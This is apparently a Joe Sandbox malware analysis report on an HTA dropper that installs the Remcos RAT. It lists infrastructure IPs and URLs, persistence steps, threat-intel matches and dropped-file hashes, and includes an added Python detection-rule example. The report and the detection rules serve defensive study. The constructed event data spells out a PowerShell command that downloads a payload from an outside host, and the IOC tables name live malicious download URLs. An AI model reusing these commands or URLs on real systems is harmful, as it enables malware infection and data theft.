https://files.catbox.moe/0o8vth.bat1 | mshta.exe, 00000000.00000003.1845946616.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854176771.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1854968519.00000000031DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1858498980.00000000031DC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://myguyapp.com/W2.pdf&vO | tasklist.exe, 00000013.00000003.1896304387.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000002.1897560257.0000000000D7A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
108.181.20.35 | files.catbox.moe | Canada | 852 | ASN852CA | false
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
193.26.115.39 | me-work.com | Netherlands | 46261 | QUICKPACKETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585493
Start date and time: 2025-01-07 18:12:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 42
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: c2.hta
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winHTA@72/99@9/3
                                              EGA Information:
                                              • Successful, ratio: 66.7%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 87
                                              • Number of non-executed functions: 297
                                              Cookbook Comments:
                                              • Found application associated with file extension: .hta
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.56.252.213, 2.16.168.105, 2.16.168.107, 18.213.11.84, 50.16.47.176, 34.237.241.83, 54.224.241.105, 162.159.61.3, 172.64.41.3, 199.232.210.172, 23.209.209.135, 184.28.90.27, 172.202.163.200, 23.203.104.175, 13.107.246.44
                                              • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                              • Execution Graph export aborted for target mshta.exe, PID 6164 because there are no executed function
• Not all processes were analyzed; the report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: c2.hta
Time | Type | Description
12:12:54 | API Interceptor | 1x Sleep call for process: mshta.exe modified
12:12:58 | API Interceptor | 55x Sleep call for process: powershell.exe modified
12:13:15 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
12:13:16 | API Interceptor | 1x Sleep call for process: msword.exe modified
12:14:25 | API Interceptor | 297x Sleep call for process: Propose.com modified
17:13:23 | Task Scheduler | Run new task: Murray, path: wscript s>//B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
17:13:26 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url
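The timeline above, together with the behavior graph, gives the whole chain a defender needs to key on: mshta.exe spawning cmd.exe, PowerShell downloading msword.zip, the scheduled task "Murray" running wscript //B on a .js under AppData, LinkHub.url written to the Startup folder, the Rmc-3QMI88 mutex, C:\ProgramData\remcos\logs.dat, and the geoplugin.net lookup. The following is an added example, not part of the Joe Sandbox report, of how those observations become detection logic. The event records are constructed to mirror this report, not real telemetry, and the field names ("type", "image", "parent", "cmdline", "action", "path", "name", "host") are this example's own schema that would have to be mapped onto Sysmon or EDR fields. The Rmc- mutex pattern is taken from the one instance here and assumed to generalize to "Rmc-" followed by alphanumerics.

```python
import re

# Full path of the dropped AutoIt-compiled stage from this report.
PROPOSE = r"C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com"

# Constructed, illustrative events modelled on the chain in this report.
# They are not sandbox output; the keys are this example's own schema.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Users\user\Desktop\c2.hta"'},
    {"type": "process", "image": r"C:\Windows\SysWOW64\cmd.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'cmd.exe /c "C:\Users\user\AppData\Local\Temp\temp.bat"'},
    {"type": "process",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": "powershell Invoke-WebRequest -Uri https://myguyapp.com/msword.zip "
                r"-OutFile C:\Users\user\AppData\Local\Temp\msword.zip"},
    {"type": "task", "name": "Murray",
     "action": r'wscript //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"'},
    {"type": "file", "image": r"C:\Windows\SysWOW64\cmd.exe",
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url"},
    {"type": "file", "image": PROPOSE, "path": r"C:\ProgramData\remcos\logs.dat"},
    {"type": "mutex", "image": PROPOSE,
     "name": r"\Sessions\1\BaseNamedObjects\Rmc-3QMI88"},
    {"type": "dns", "image": PROPOSE, "host": "geoplugin.net"},
    # Benign control events (also constructed): no rule should fire on these.
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
    {"type": "task", "name": "OneDrive Standalone Update Task",
     "action": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe"},
    {"type": "file", "image": r"C:\Windows\explorer.exe",
     "path": r"C:\Users\user\Documents\notes.txt"},
    {"type": "mutex", "image": r"C:\Program Files\Example\app.exe",
     "name": r"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
PS_DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer", re.I)
# wscript/cscript run with //B (batch mode, error dialogs suppressed) on a
# script under a user-writable directory, as the "Murray" task does here.
WSH_BATCH = re.compile(r"\b[wc]script(?:\.exe)?\s+//?B\b", re.I)
USER_WRITABLE = re.compile(r"\\(?:AppData|ProgramData|Users\\Public|Temp)\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
# Remcos mutex naming ("Rmc-" + alphanumerics; assumed from Rmc-3QMI88) and keylog file.
REMCOS_MUTEX = re.compile(r"\\Rmc-[A-Z0-9]{4,}$")
REMCOS_LOG = re.compile(r"\\remcos\\logs\.dat$", re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the rules that fire on a single event."""
    hits = []
    kind = event["type"]
    if kind == "process":
        parent, child = basename(event["parent"]), basename(event["image"])
        if parent in SCRIPT_HOSTS and child in SHELLS:
            hits.append("script_host_spawns_shell")
        if child in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD.search(event["cmdline"]):
            hits.append("powershell_download")
    elif kind == "task":
        if WSH_BATCH.search(event["action"]) and USER_WRITABLE.search(event["action"]):
            hits.append("task_runs_wsh_batch_from_user_dir")
    elif kind == "file":
        if STARTUP_DIR.search(event["path"]):
            hits.append("startup_folder_write")
        if REMCOS_LOG.search(event["path"]):
            hits.append("remcos_keylog_file")
    elif kind == "mutex":
        if REMCOS_MUTEX.search(event["name"]):
            hits.append("remcos_mutex")
    elif kind == "dns" and event["host"].lower() == "geoplugin.net":
        # Weak alone (other RATs and some legitimate software use it); the
        # value is in correlating it with the process that issued the lookup.
        hits.append("geoplugin_lookup")
    return hits


def scan(events):
    """Return (rule, evidence) pairs for every event that trips a rule."""
    findings = []
    for event in events:
        actor = basename(event["image"]) if "image" in event else "task " + event["name"]
        evidence = (event.get("cmdline") or event.get("action") or event.get("path")
                    or event.get("name") or event.get("host"))
        for rule in evaluate(event):
            findings.append((rule, f"{actor}: {evidence}"))
    return findings


if __name__ == "__main__":
    for rule, evidence in scan(EVENTS):
        print(f"{rule:36} {evidence}")
```

Run against the constructed events, the eight malicious records each trip exactly one rule and the four benign ones trip none. The mutex and logs.dat rules are the high-confidence ones; the process-lineage, task and Startup rules are generic enough to catch the same chain with different file names, which is why they are kept separate rather than folded into a single Remcos signature.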
Match | Associated Sample Name / URL | Detection | Threat Name | Context
108.181.20.35 | Document.pdf.lnk | malicious | Unknown | files.catbox.moe/p1yr9i.pdf
108.181.20.35 | SecuriteInfo.com.HEUR.Trojan.OLE2.Agent.gen.26943.12401.msi | malicious | LummaC Stealer | files.catbox.moe/nzct1p
178.237.33.50 | RailProvides_nopump.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | c2.hta | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | c2.hta | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 4XYAW8PbZH.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | iGhDjzEiDU.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 1.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | heteronymous.vbs | malicious | Remcos, GuLoader | geoplugin.net/json.gp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
me-work.com | RailProvides_nopump.exe | malicious | Remcos | 193.26.115.39
me-work.com | c2.hta | malicious | Remcos | 193.26.115.39
me-work.com | c2.hta | malicious | Remcos | 193.26.115.39
me-work.com | c2.hta | malicious | XWorm | 193.26.115.21
me-work.com | c2.hta | malicious | XWorm | 193.26.115.21
me-work.com | c2.hta | malicious | XWorm | 193.26.115.21
me-work.com | c2.hta | malicious | XWorm | 87.120.117.152
me-work.com | p5.hta | malicious | XWorm | 45.88.186.197
files.catbox.moe | DHL AWB-documents.lnk | malicious | Divulge Stealer | 108.181.20.35
files.catbox.moe | doc00290320092.jse | malicious | AgentTesla, PureLog Stealer | 108.181.20.35
files.catbox.moe | TT copy.js | malicious | FormBook | 108.181.20.35
files.catbox.moe | z68scancopy.vbs | malicious | FormBook | 108.181.20.35
files.catbox.moe | 2zirzlMVqX.bat | malicious | Xmrig | 108.181.20.35
files.catbox.moe | QwLii5vouB.exe | malicious | Unknown | 108.181.20.35
files.catbox.moe | PO Huaruicarbon 98718.html | malicious | CorporateDataTheft, HTMLPhisher | 108.181.20.35
files.catbox.moe | 5QnwxSJVyX.doc | malicious | Unknown | 108.181.20.35
files.catbox.moe | file.exe | malicious | FormBook | 108.181.20.35
files.catbox.moe | file.exe | malicious | FormBook | 108.181.20.35
bg.microsoft.map.fastly.net | FACTURAMAIL.html | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 3e18bdf74f3caef770a7edcf748bdaf0e6a4a21664e69.exe | malicious | AsyncRAT, GhostRat | 199.232.214.172
bg.microsoft.map.fastly.net | Kawpow new.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526 | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | Here is the completed and scanned document.eml | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | c2.hta | malicious | Remcos | 199.232.210.172
bg.microsoft.map.fastly.net | sfqbr.ps1 | malicious | DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT | 199.232.214.172
bg.microsoft.map.fastly.net | Vernales Restaurant-encrypted.pdf | malicious | HTMLPhisher | 199.232.210.172
bg.microsoft.map.fastly.net | KHK0987.xlsx | malicious | Unknown | 199.232.214.172
geoplugin.net | RailProvides_nopump.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | c2.hta | malicious | Remcos | 178.237.33.50
geoplugin.net | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | malicious | Remcos | 178.237.33.50
geoplugin.net | c2.hta | malicious | Remcos | 178.237.33.50
geoplugin.net | 4XYAW8PbZH.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | iGhDjzEiDU.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 1.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | heteronymous.vbs | malicious | Remcos, GuLoader | 178.237.33.50
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ASN852CA | miori.spc.elf | malicious | Unknown | 207.134.206.79
ASN852CA | miori.ppc.elf | malicious | Unknown | 173.182.249.54
ASN852CA | momo.arm7.elf | malicious | Mirai | 154.5.112.131
ASN852CA | z0r0.sh4.elf | malicious | Mirai | 50.99.231.33
ASN852CA | sHCznAai4a.bat | malicious | Unknown | 108.181.20.35
ASN852CA | Fantazy.arm7.elf | malicious | Mirai | 198.53.124.239
ASN852CA | Fantazy.i486.elf | malicious | Unknown | 161.184.66.8
ASN852CA | Fantazy.x86.elf | malicious | Unknown | 209.52.250.243
ASN852CA | 1.elf | malicious | Unknown | 161.188.162.114
ASN852CA | Hilix.arm7.elf | malicious | Mirai | 75.153.94.164
ATOM86-ASATOM86NL | RailProvides_nopump.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | c2.hta | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 9W9jJCj9EV.bat | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | c2.hta | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | c2.hta | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 4XYAW8PbZH.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | iGhDjzEiDU.exe | malicious | Remcos | 178.237.33.50
ATOM86-ASATOM86NL | 1.exe | malicious | Remcos | 178.237.33.50
QUICKPACKETUS | RailProvides_nopump.exe | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | c2.hta | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | https://z97f4f2525fyg27.webflow.io/ | malicious | HTMLPhisher | 172.82.129.154
QUICKPACKETUS | 9W9jJCj9EV.bat | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | c2.hta | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | c2.hta | malicious | Remcos | 193.26.115.39
QUICKPACKETUS | Dd5DwDCHJD.exe | malicious | Quasar | 193.31.28.181
QUICKPACKETUS | 3e88PGFfkf.exe | malicious | DCRat | 185.230.138.58
QUICKPACKETUS | arm.nn.elf | malicious | Mirai, Okiru | 198.22.235.170
QUICKPACKETUS | la.bot.powerpc.elf | malicious | Mirai | 198.22.243.54
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | HaLCYOFjMN.exe | malicious | DCRat, PureLog Stealer, RedLine, XWorm, zgRAT | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | UXxZ4m65ro.exe | malicious | Quasar | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | Customer.exe | malicious | XWorm | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | Solara Bootstrapper.exe | malicious | Unknown | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | Solara.exe | malicious | Unknown | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | vRecording__0023secs__Stgusa.html | malicious | Unknown | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | ENQ-0092025.doc | malicious | DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | U1P3u1tkB2.exe | malicious | Unknown | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | U1P3u1tkB2.exe | malicious | Unknown | 193.26.115.39
3b5074b1b5d032e5620f69f9f700ff0e | 9876567899.bat.exe | malicious | Lokibot | 193.26.115.39
37f463bf4616ecd445d4a1937da06e19 | setup.msi | malicious | Unknown | 108.181.20.35
37f463bf4616ecd445d4a1937da06e19 | 1.exe | malicious | LummaC, XRed | 108.181.20.35
37f463bf4616ecd445d4a1937da06e19 | 9876567899.bat.exe | malicious | Lokibot | 108.181.20.35
37f463bf4616ecd445d4a1937da06e19 | 23567791246-764698008.02.exe | malicious | Unknown | 108.181.20.35
37f463bf4616ecd445d4a1937da06e19 | c2.hta | malicious | Remcos | 108.181.20.35
37f463bf4616ecd445d4a1937da06e19 | H565rymIuO.doc | malicious | Unknown | 108.181.20.35
37f463bf4616ecd445d4a1937da06e19 | 287438657364-7643738421.08.exe | malicious | Nitol | 108.181.20.35
37f463bf4616ecd445d4a1937da06e19 | 287438657364-7643738421.08.exe | malicious | Unknown | 108.181.20.35
37f463bf4616ecd445d4a1937da06e19 | u1XWB0BIju.msi | malicious | Unknown | 108.181.20.35
37f463bf4616ecd445d4a1937da06e19 | setup.msi | malicious | Unknown | 108.181.20.35
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | [UPD]Intel_Unit.2.1.exe | malicious | LummaC
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Set-up.exe | malicious | LummaC
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Setup.exe | malicious | LummaC
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | RailProvides_nopump.exe | malicious | Remcos
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | c2.hta | malicious | Remcos
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | installer_1.05_36.8.exe | malicious | LummaC
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Setup.exe | malicious | LummaC
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | DansMinistrie.exe | malicious | LummaC
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | installer_1.05_36.7.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Set-up.exe | malicious | LummaC Stealer
                                                                  Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):144
                                                                  Entropy (8bit):3.369034834541982
                                                                  Encrypted:false
                                                                  SSDEEP:3:rglswkfOl07QDl5JWRal2Jl+7R0DAlBG45klovDl6v:MlsBGlp5YcIeeDAlOWAv
                                                                  MD5:317AA7999F49B0C4FD23D4CBC2A51787
                                                                  SHA1:9B7097868D6D1C2C36FB25FE62817AE276458089
                                                                  SHA-256:F1F95B1FB5162A94C43E8F48D6CF145D34B7F6C51A6A1CBC96F94D4F77B9294D
                                                                  SHA-512:1A78AB79C1B7468336842BE08EE2A11F6915552A97AA2FB547315794B778FF1DFEA0A7AEE0D986D7C0F7003EC79EE4DEF816485C964C29B26E28DD1C2077636B
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                  Preview:....[.2.0.2.5./.0.1./.0.7. .1.2.:.1.3.:.5.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):5.135878529345168
                                                                  Encrypted:false
                                                                  SSDEEP:6:iOp+GNFIq2Pwkn2nKuAl9OmbnIFUtL+nBZZmwl+nBzkwOwkn2nKuAl9OmbjLJ:7pnOvYfHAahFUtL6Z/l6z5JfHAaSJ
                                                                  MD5:2FECE4A43C34C4E34455DD4C46B71AB5
                                                                  SHA1:18377F15D4153855AD7366D9B9E77E1DF49DE432
                                                                  SHA-256:29852B5BC71E3BA69C5E95F0E3054730198845EB9C28F0DE90BF0FA8FDD91CEC
                                                                  SHA-512:205C2602815043AE0E8D18524A3C1442F0366E998D1D85397EA5F8E3D1AA48E3B55E6C9DA6791DFCB7C7FB2E28BD9A0FCB07EBECF2E47DEE5765F95F84D213E9
                                                                  Malicious:false
                                                                  Preview:2025/01/07-12:13:01.978 1e20 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-12:13:01.991 1e20 Recovering log #3.2025/01/07-12:13:01.991 1e20 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):336
                                                                  Entropy (8bit):5.119275652554515
                                                                  Encrypted:false
                                                                  SSDEEP:6:iOp+XCQjL+q2Pwkn2nKuAl9Ombzo2jMGIFUtL+XEuAIz1Zmwl+XODLVkwOwkn2ng:7poCQOvYfHAa8uFUtLo1Ai1/loc5JfHA
                                                                  MD5:1A70A169BAF7020C6ED937E2BD678BA3
                                                                  SHA1:6478782554CCD5DB258EF0C4B75502599D6E9063
                                                                  SHA-256:A191A3FC31A43C94ADE459CFEBE5885BC4DC36BFD62269543ABAE6D3BD146567
                                                                  SHA-512:19B4AE0B7D7105DA347F217B9271BD1E5CAA76254A976FF9A8EBF0919A410013E7A6067A00EA0902B590A0F4E8E02643DA647880BC7372E4F04AB5138217A445
                                                                  Malicious:false
                                                                  Preview:2025/01/07-12:13:02.223 1ee8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-12:13:02.225 1ee8 Recovering log #3.2025/01/07-12:13:02.226 1ee8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:modified
                                                                  Size (bytes):475
                                                                  Entropy (8bit):4.961305759039287
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sq1sBdOg2Hzy2caq3QYiubInP7E4T3y:Y2sRds7dMHGJ3QYhbG7nby
                                                                  MD5:870ACE152125C2734E1DABEA6598134F
                                                                  SHA1:C00F7A2C562C1BE2AD1D25D7C9BE816740CBB61E
                                                                  SHA-256:0E96B514F3B1803598FF0EA8B9F6FA8A9BE1F1C99AA2005B97B5DEFFF1FC7E0B
                                                                  SHA-512:E93634F1DC16E9AFD7E14DC8FCFFF4AD91213464F03A2CAB3F2D950127459DBF00B58957AFC4386BF1B616BE565E422AE473070A8E247B5F5D94A121248DD9C0
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380829994454653","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":139190},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):475
                                                                  Entropy (8bit):4.961305759039287
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sq1sBdOg2Hzy2caq3QYiubInP7E4T3y:Y2sRds7dMHGJ3QYhbG7nby
                                                                  MD5:870ACE152125C2734E1DABEA6598134F
                                                                  SHA1:C00F7A2C562C1BE2AD1D25D7C9BE816740CBB61E
                                                                  SHA-256:0E96B514F3B1803598FF0EA8B9F6FA8A9BE1F1C99AA2005B97B5DEFFF1FC7E0B
                                                                  SHA-512:E93634F1DC16E9AFD7E14DC8FCFFF4AD91213464F03A2CAB3F2D950127459DBF00B58957AFC4386BF1B616BE565E422AE473070A8E247B5F5D94A121248DD9C0
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380829994454653","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":139190},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4320
                                                                  Entropy (8bit):5.257683398150361
                                                                  Encrypted:false
                                                                  SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo78PnNV8:etJCV4FiN/jTN/2r8Mta02fEhgO73go3
                                                                  MD5:FC7FA10805554558365CED728C5953A5
                                                                  SHA1:00F1183BB81179991E8999F620DE4B3F10765BEC
                                                                  SHA-256:FBFCF80CEC43B66BACAB7772C755B9ACEFDE3420D78E5E4D39EE2A4F14E2CB78
                                                                  SHA-512:5D0A963F87A1860E3030EC96ADD465D54A1E579728003FA54C7E094C4D4ABF8207EF10D4DEF1EF8B9A319E42E02C2437CDA51A2ED07E7820437EEA19A6BA5426
                                                                  Malicious:false
                                                                  Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):324
                                                                  Entropy (8bit):5.16138107375685
                                                                  Encrypted:false
